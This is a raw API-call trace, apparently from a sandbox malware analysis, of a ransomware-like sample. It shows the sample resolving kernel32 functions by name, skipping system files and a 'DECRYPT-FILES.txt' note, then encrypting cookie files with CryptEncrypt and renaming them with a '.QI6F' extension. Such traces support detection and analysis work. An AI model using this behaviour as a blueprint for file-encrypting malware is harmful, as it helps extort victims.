returned 19 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.041] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.041] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.041] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.041] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.041] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.041] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.041] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.041] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.041] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.042] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.042] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.042] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.042] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.042] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt") returned 124 [0079.042] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F") returned 129 [0079.042] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.qi6f"), dwFlags=0x0) returned 1 [0079.043] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.043] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.043] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.043] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44bd95f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44bd95f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44bd95f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", cAlternateFileName="5P37D9~1.TXT")) returned 1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="autorun.inf") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="boot.ini") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="desktop.ini") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="ntuser.dat") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="iconcache.db") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="bootsect.bak") returned -1 [0079.043] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="thumbs.db") returned -1 [0079.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="Bootfont.bin") returned -1 [0079.044] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt") returned 43 [0079.044] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.044] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.044] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.044] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.044] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.044] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt") returned 43 [0079.044] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.044] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" [0079.044] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.044] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=102) returned 1 [0079.044] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.044] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.045] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.045] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.045] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.046] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.046] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.047] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.047] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.047] CloseHandle (hObject=0x464) returned 1 [0079.048] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.048] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.048] CloseHandle (hObject=0x0) returned 0 [0079.048] CloseHandle (hObject=0x460) returned 1 [0079.049] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.049] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.049] GetTickCount () returned 0x114c41a [0079.050] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.050] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.050] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.050] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.050] lstrlenA (lpString="kernel32.dll") returned 12 [0079.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.051] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.051] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.051] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.051] lstrlenA (lpString="ADDATOMA") returned 8 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.051] lstrlenA (lpString="ADDATOMW") returned 8 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.051] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.051] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.051] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.051] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.051] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.051] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.051] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.051] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.051] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.051] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.051] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.051] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.051] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.052] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.052] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.052] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.052] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.052] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.052] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.052] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.052] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.052] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.052] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.052] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.052] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.052] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.052] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.052] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.052] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.052] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.052] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.053] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.053] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.053] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.053] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.053] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.053] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.053] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.053] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.053] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.053] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.053] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.053] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.053] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.053] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.053] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.053] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.053] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.053] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.054] lstrlenA (lpString="BEEP") returned 4 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.054] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.054] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.054] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.054] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.054] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.054] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.054] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.054] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.054] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.054] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.054] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.054] lstrlenA (lpString="CANCELIO") returned 8 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") 